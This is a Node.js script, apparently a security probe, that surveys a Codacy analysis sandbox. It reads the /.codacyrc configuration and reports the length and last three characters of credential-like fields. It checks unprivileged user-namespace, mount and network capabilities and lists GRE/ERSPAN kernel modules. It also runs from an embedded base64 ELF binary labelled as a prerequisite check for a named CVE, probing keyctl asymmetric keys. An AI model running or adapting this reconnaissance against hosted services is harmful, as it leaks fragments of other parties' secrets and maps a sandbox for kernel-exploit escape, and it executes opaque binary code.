const fs = require('fs');
const os = require('os');
const { execFileSync } = require('child_process');

const CREDENTIAL_NAME = /(token|secret|password|passwd|credential|api.?key|private.?key|auth)/i;

function compact(value, max = 160) {
  return String(value ?? 'unknown')
    .replace(/[\s\x00-\x1f\x7f]+/g, '_')
    .slice(0, max);
}

function redacted(value) {
  const characters = Array.from(String(value ?? ''));
  return `length=${characters.length},last3=${JSON.stringify(characters.slice(-3).join(''))}`;
}

function readText(target, max = 262144) {
  try {
    return fs.readFileSync(target, 'utf8').slice(0, max);
  } catch {
    return null;
  }
}

function commandProbe(command, args, timeout = 1800) {
  try {
    execFileSync(command, args, { stdio: 'ignore', timeout });
    return true;
  } catch {
    return false;
  }
}

function codacyConfigurationEvidence() {
  const target = '/.codacyrc';
  let stat = null;
  try { stat = fs.statSync(target); } catch {}
  const raw = readText(target);
  const keyNames = new Set();
  const scalars = [];
  let parsed = null;
  let parseError = false;

  if (raw !== null) {
    try { parsed = JSON.parse(raw); } catch { parseError = true; }
  }

  function walk(value, path, depth) {
    if (depth > 12 || scalars.length >= 512) return;
    if (Array.isArray(value)) {
      value.forEach((entry, index) => walk(entry, `${path}[${index}]`, depth + 1));
      return;
    }
    if (value && typeof value === 'object') {
      for (const [key, entry] of Object.entries(value)) {
        keyNames.add(key);
        walk(entry, path ? `${path}.${key}` : key, depth + 1);
      }
      return;
    }
    scalars.push({ path, type: value === null ? 'null' : typeof value, value: String(value ?? '') });
  }
  if (parsed !== null) walk(parsed, '$', 0);

  const prioritized = [...scalars].sort((left, right) => {
    const leftCredential = CREDENTIAL_NAME.test(left.path) ? 0 : 1;
    const rightCredential = CREDENTIAL_NAME.test(right.path) ? 0 : 1;
    return leftCredential - rightCredential || left.path.localeCompare(right.path);
  });
  const selected = prioritized.slice(0, 32);
  const credentialPaths = prioritized.filter(entry => CREDENTIAL_NAME.test(entry.path)).map(entry => entry.path).slice(0, 32);

  return [
    'ARCSEC_DEEP_CODACYRC',
    `exists=${Boolean(stat)}`,
    `readable=${raw !== null}`,
    `size=${stat?.size ?? 'unknown'}`,
    `mode=${stat ? (stat.mode & 0o7777).toString(8) : 'unknown'}`,
    `uid=${stat?.uid ?? 'unknown'}`,
    `gid=${stat?.gid ?? 'unknown'}`,
    `json_parse=${parsed !== null}`,
    `parse_error=${parseError}`,
    `top_type=${Array.isArray(parsed) ? 'array' : parsed === null ? 'unknown' : typeof parsed}`,
    `key_names=${[...keyNames].sort().slice(0, 96).join('|') || 'none'}`,
    `scalar_total=${scalars.length}`,
    `scalar_reported=${selected.length}`,
    `credential_paths=${credentialPaths.join('|') || 'none'}`,
    `scalar_evidence=${selected.map(entry => `${compact(entry.path, 100)}{type=${entry.type},${redacted(entry.value)}}`).join(';') || 'none'}`
  ].join(' ');
}

function userNamespaceEvidence() {
  const mountDirectory = `/tmp/arcsec-userns-mount-${process.pid}`;
  let userMountTmpfs = false;
  try {
    fs.mkdirSync(mountDirectory, { recursive: false, mode: 0o700 });
    const script = `mount -t tmpfs tmpfs ${mountDirectory} && umount ${mountDirectory}`;
    userMountTmpfs = commandProbe('unshare', ['-Ur', '-m', '/bin/sh', '-c', script], 2500);
  } catch {
    userMountTmpfs = false;
  } finally {
    try { fs.rmdirSync(mountDirectory); } catch {}
  }

  return [
    'ARCSEC_DEEP_USERNS',
    `kernel=${compact(os.release(), 120)}`,
    `arch=${compact(os.arch(), 30)}`,
    `lsm=${compact(readText('/sys/kernel/security/lsm', 1024), 120)}`,
    `unprivileged_userns_clone=${compact(readText('/proc/sys/kernel/unprivileged_userns_clone', 64), 20)}`,
    `unprivileged_bpf_disabled=${compact(readText('/proc/sys/kernel/unprivileged_bpf_disabled', 64), 20)}`,
    `kptr_restrict=${compact(readText('/proc/sys/kernel/kptr_restrict', 64), 20)}`,
    `dmesg_restrict=${compact(readText('/proc/sys/kernel/dmesg_restrict', 64), 20)}`,
    `user_only=${commandProbe('unshare', ['-Ur', 'true'])}`,
    `user_mount=${commandProbe('unshare', ['-Ur', '-m', 'true'])}`,
    `user_network=${commandProbe('unshare', ['-Ur', '-n', 'true'])}`,
    `user_pid=${commandProbe('unshare', ['-Ur', '-p', '-f', 'true'])}`,
    `user_mount_tmpfs=${userMountTmpfs}`
  ].join(' ');
}

function kernelNamespacePrerequisiteEvidence() {
  const interfaceNames = (() => {
    try { return fs.readdirSync('/sys/class/net').sort(); } catch { return []; }
  })();
  const interfaces = interfaceNames.slice(0, 32).map(name => {
    const root = `/sys/class/net/${name}`;
    return [
      compact(name, 40),
      `type=${compact(readText(`${root}/type`, 32), 16)}`,
      `ifindex=${compact(readText(`${root}/ifindex`, 32), 16)}`,
      `iflink=${compact(readText(`${root}/iflink`, 32), 16)}`
    ].join('{') + '}';
  });
  const modules = (readText('/proc/modules', 262144) ?? '')
    .split('\n')
    .map(line => line.split(/\s+/, 1)[0])
    .filter(Boolean);
  const greModules = modules.filter(name => /(^|_)(gre|erspan)($|_)/i.test(name)).slice(0, 32);
  const kernelConfiguration = [
    `/boot/config-${os.release()}`,
    '/proc/config.gz'
  ].map(target => ({ target, readable: readText(target, 4096) !== null }));
  const nestedInterfaces = (() => {
    try {
      return compact(execFileSync('unshare', [
        '-Urn',
        '/bin/sh',
        '-c',
        'for item in /sys/class/net/*; do [ -e "$item" ] && basename "$item"; done'
      ], { encoding: 'utf8', timeout: 1800 }).trim().split(/\s+/).sort().join('|'), 160);
    } catch (error) {
      return `failed_${compact(error?.code || error?.signal || 'error', 40)}`;
    }
  })();

  return [
    'ARCSEC_DEEP_KERNEL_PREREQUISITE',
    `kernel=${compact(os.release(), 120)}`,
    `parent_interfaces=${interfaces.join(';') || 'none'}`,
    `parent_gre_interface=${interfaces.some(entry => /type=778(?:\{|})/.test(entry) || /type=65534(?:\{|})/.test(entry))}`,
    `loaded_gre_modules=${greModules.join('|') || 'none'}`,
    `sys_module_ip_gre=${fs.existsSync('/sys/module/ip_gre')}`,
    `sys_module_erspan=${fs.existsSync('/sys/module/erspan')}`,
    `kernel_config_readable=${kernelConfiguration.filter(entry => entry.readable).map(entry => compact(entry.target, 120)).join('|') || 'none'}`,
    `ip_tool=${commandProbe('/bin/sh', ['-c', 'command -v ip >/dev/null 2>&1'])}`,
    `nested_interfaces=${nestedInterfaces || 'none'}`
  ].join(' ');
}

const KEYCTL_PREREQUISITE_PROBE_BASE64 = 'f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAFREAAAAAAABAAAAAAAAAAJgwAAAAAAAAAAAAAEAAOAAKAEAADQAMAAEAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2QIAAAAAAADZAgAAAAAAAAAQAAAAAAAAAQAAAAUAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAAAADTAgAAAAAAANMCAAAAAAAAABAAAAAAAAABAAAABAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAPgBAAAAAAAA+AEAAAAAAAAAEAAAAAAAAAEAAAAGAAAAIC8AAAAAAAAgPwAAAAAAACA/AAAAAAAA4AAAAAAAAAAAQwAAAAAAAAAQAAAAAAAAAgAAAAYAAAAgLwAAAAAAACA/AAAAAAAAID8AAAAAAADgAAAAAAAAAOAAAAAAAAAACAAAAAAAAAAEAAAABAAAAHACAAAAAAAAcAIAAAAAAABwAgAAAAAAADAAAAAAAAAAMAAAAAAAAAAIAAAAAAAAAFPldGQEAAAAcAIAAAAAAABwAgAAAAAAAHACAAAAAAAAMAAAAAAAAAAwAAAAAAAAAAgAAAAAAAAAUOV0ZAQAAABEIQAAAAAAAEQhAAAAAAAARCEAAAAAAAAsAAAAAAAAACwAAAAAAAAABAAAAAAAAABR5XRkBgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAFLldGQEAAAAIC8AAAAAAAAgPwAAAAAAACA/AAAAAAAA4AAAAAAAAADgAAAAAAAAAAEAAAAAAAAABAAAACAAAAAFAAAAR05VAAEAAcAEAAAAAQAAAAAAAAACAAHABAAAAAEAAAAAAAAAAQAAAAEAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKAEFSQ1NFQ19LRVlDVExfUFJFUkVRVUlTSVRFIAByZWFkX2Vycm5vPQBrZXlyaW5nX2Vycm5vPQBrZXlyaW5nPXRydWUgAGFzeW1tZXRyaWNfYWRkX2Vycm5vPQBhc3ltbWV0cmljX2FkZD10cnVlIABwa2V5X3F1ZXJ5X2Vycm5vPQBwa2V5X3F1ZXJ5PXRydWUgAHN1cHBvcnRlZF9vcHM9AGtleV9zaXplPQBtYXhfZGF0YV9zaXplPQBtYXhfc2lnX3NpemU9AG1heF9lbmNfc2l6ZT0AbWF4X2RlY19zaXplPQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZW5jPXBrY3MxAAAAAAAAAGFzeW1tZXRyaWMAAAAAAABhcmNzZWMtY3ZlLTIwMjYtNjM4MjQtcHJlcmVxdWlzaXRlAAABGwM7KAAAAAQAAAC87v//RAAAAA3v//9YAAAAle///3AAAADR7///hAAAABQAAAAAAAAAAXpSAAF4EAEbDAcIkAEAABAAAAAcAAAAcO7//1EAAAAAAAAAFAAAADAAAACt7v//iAAAAABEDigCfw4IEAAAAEgAAAAd7///PAAAAAAAAAAsAAAAXAAAAEXv//++AQAAAEIOEI4CSg4YjQNRDiCMBEEOKIYFRg4wgwZHDnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA